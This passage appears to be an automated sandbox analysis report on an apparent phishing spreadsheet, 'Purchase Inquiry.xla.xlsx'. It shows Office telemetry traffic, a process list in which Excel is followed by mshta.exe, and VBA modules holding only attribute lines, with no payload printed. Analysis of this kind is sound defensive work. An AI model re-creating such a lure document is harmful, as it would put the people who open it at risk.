                                      x-azure-ref: 20250310T081340Z-15874666d58dtrnthC1CH1127n000000019g000000003q9s
                                      x-fd-int-roxy-purgeid: 0
                                      X-Cache-Info: L1_T2
                                      X-Cache: TCP_HIT
                                      Accept-Ranges: bytes
                                      2025-03-10 08:13:40 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                      Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                      2025-03-10 08:13:40 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                                      Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                                      2025-03-10 08:13:40 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                                      Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                      2025-03-10 08:13:40 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                      Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                      2025-03-10 08:13:40 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                      Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                      2025-03-10 08:13:40 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                                      Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                      2025-03-10 08:13:40 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                                      Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                      2025-03-10 08:13:40 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                      Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                      2025-03-10 08:13:40 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                                      Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                      2025-03-10 08:13:40 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                      Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.74970613.107.253.724437088C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      TimestampBytes transferredDirectionData
                                      2025-03-10 08:13:48 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept-Encoding: gzip
                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                      Host: otelrules.svc.static.microsoft
                                      2025-03-10 08:13:48 UTC471INHTTP/1.1 200 OK
                                      Date: Mon, 10 Mar 2025 08:13:48 GMT
                                      Content-Type: text/xml
                                      Content-Length: 204
                                      Connection: close
                                      Cache-Control: public, max-age=604800, immutable
                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                      ETag: "0x8DC582BB6C8527A"
                                      x-ms-request-id: 334649ef-301e-0052-7b94-9165d6000000
                                      x-ms-version: 2018-03-28
                                      x-azure-ref: 20250310T081348Z-15874666d58dtrnthC1CH1127n00000001g00000000000tq
                                      x-fd-int-roxy-purgeid: 0
                                      X-Cache: TCP_MISS
                                      Accept-Ranges: bytes
                                      2025-03-10 08:13:48 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.74970713.107.253.724437088C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      TimestampBytes transferredDirectionData
                                      2025-03-10 08:13:48 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept-Encoding: gzip
                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                      Host: otelrules.svc.static.microsoft
                                      2025-03-10 08:13:48 UTC495INHTTP/1.1 200 OK
                                      Date: Mon, 10 Mar 2025 08:13:48 GMT
                                      Content-Type: text/xml
                                      Content-Length: 2128
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Cache-Control: public, max-age=604800, immutable
                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                      ETag: "0x8DC582BA41F3C62"
                                      x-ms-request-id: 1705ab94-901e-0015-7f94-91b284000000
                                      x-ms-version: 2018-03-28
                                      x-azure-ref: 20250310T081348Z-r15847dcb49swvcqhC1CH15p5s0000000130000000002rg7
                                      x-fd-int-roxy-purgeid: 0
                                      X-Cache: TCP_MISS
                                      Accept-Ranges: bytes
                                      2025-03-10 08:13:48 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.74970913.107.253.724435324C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      TimestampBytes transferredDirectionData
                                      2025-03-10 08:13:50 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept-Encoding: gzip
                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                      Host: otelrules.svc.static.microsoft
                                      2025-03-10 08:13:51 UTC491INHTTP/1.1 200 OK
                                      Date: Mon, 10 Mar 2025 08:13:51 GMT
                                      Content-Type: text/xml
                                      Content-Length: 204
                                      Connection: close
                                      Cache-Control: public, max-age=604800, immutable
                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                      ETag: "0x8DC582BB6C8527A"
                                      x-ms-request-id: 334649ef-301e-0052-7b94-9165d6000000
                                      x-ms-version: 2018-03-28
                                      x-azure-ref: 20250310T081351Z-15874666d5827866hC1CH1v2dc00000003sg000000000g22
                                      x-fd-int-roxy-purgeid: 0
                                      X-Cache: TCP_HIT
                                      X-Cache-Info: L1_T2
                                      Accept-Ranges: bytes
                                      2025-03-10 08:13:51 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.74970813.107.253.724435324C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      TimestampBytes transferredDirectionData
                                      2025-03-10 08:13:50 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept-Encoding: gzip
                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                      Host: otelrules.svc.static.microsoft
                                      2025-03-10 08:13:51 UTC494INHTTP/1.1 200 OK
                                      Date: Mon, 10 Mar 2025 08:13:51 GMT
                                      Content-Type: text/xml
                                      Content-Length: 2128
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Cache-Control: public, max-age=604800, immutable
                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                      ETag: "0x8DC582BA41F3C62"
                                      x-ms-request-id: e6cfb52d-f01e-003f-3294-91d19d000000
                                      x-ms-version: 2018-03-28
                                      x-azure-ref: 20250310T081351Z-r15847dcb49vfhxrhC1CH1b0qw0000000g7g000000001q1f
                                      x-fd-int-roxy-purgeid: 0
                                      X-Cache: TCP_HIT
                                      Accept-Ranges: bytes
                                      2025-03-10 08:13:51 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:04:12:23
                                      Start date:10/03/2025
                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                      Imagebase:0x670000
                                      File size:53'161'064 bytes
                                      MD5 hash:4A871771235598812032C822E6F68F19
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:14
                                      Start time:04:13:24
                                      Start date:10/03/2025
                                      Path:C:\Windows\SysWOW64\mshta.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                      Imagebase:0xae0000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:16
                                      Start time:04:13:32
                                      Start date:10/03/2025
                                      Path:C:\Windows\splwow64.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\splwow64.exe 12288
                                      Imagebase:0x7ff63ea20000
                                      File size:163'840 bytes
                                      MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:18
                                      Start time:04:13:42
                                      Start date:10/03/2025
                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Purchase Inquiry.xla.xlsx"
                                      Imagebase:0x670000
                                      File size:53'161'064 bytes
                                      MD5 hash:4A871771235598812032C822E6F68F19
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Call Graph

                                      • Entrypoint
                                      • Decryption Function
                                      • Executed
                                      • Not Executed
                                      • Show Help
                                      callgraph 1 Error: Graph is empty

                                      Module: Sheet1

                                      Declaration
                                      LineContent
                                      1

                                      Attribute VB_Name = "Sheet1"

                                      2

                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                      3

                                      Attribute VB_GlobalNameSpace = False

                                      4

                                      Attribute VB_Creatable = False

                                      5

                                      Attribute VB_PredeclaredId = True

                                      6

                                      Attribute VB_Exposed = True

                                      7

                                      Attribute VB_TemplateDerived = False

                                      8

                                      Attribute VB_Customizable = True

                                      Module: Sheet2

                                      Declaration
                                      LineContent
                                      1

                                      Attribute VB_Name = "Sheet2"

                                      2

                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                      3

                                      Attribute VB_GlobalNameSpace = False

                                      4

                                      Attribute VB_Creatable = False

                                      5

                                      Attribute VB_PredeclaredId = True

                                      6

                                      Attribute VB_Exposed = True

                                      7

                                      Attribute VB_TemplateDerived = False

                                      8

                                      Attribute VB_Customizable = True

                                      Module: Sheet3

                                      Declaration
                                      LineContent
                                      1

                                      Attribute VB_Name = "Sheet3"

                                      2

                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                      3

                                      Attribute VB_GlobalNameSpace = False

                                      4

                                      Attribute VB_Creatable = False

                                      5

                                      Attribute VB_PredeclaredId = True

                                      6

                                      Attribute VB_Exposed = True

                                      7

                                      Attribute VB_TemplateDerived = False

                                      8

                                      Attribute VB_Customizable = True

                                      Module: ThisWorkbook

                                      Declaration
                                      LineContent
                                      1

                                      Attribute VB_Name = "ThisWorkbook"

                                      2

                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                      3

                                      Attribute VB_GlobalNameSpace = False

                                      4

                                      Attribute VB_Creatable = False

                                      5

                                      Attribute VB_PredeclaredId = True

                                      6

                                      Attribute VB_Exposed = True

                                      7

                                      Attribute VB_TemplateDerived = False

                                      8

                                      Attribute VB_Customizable = True

                                      Reset < >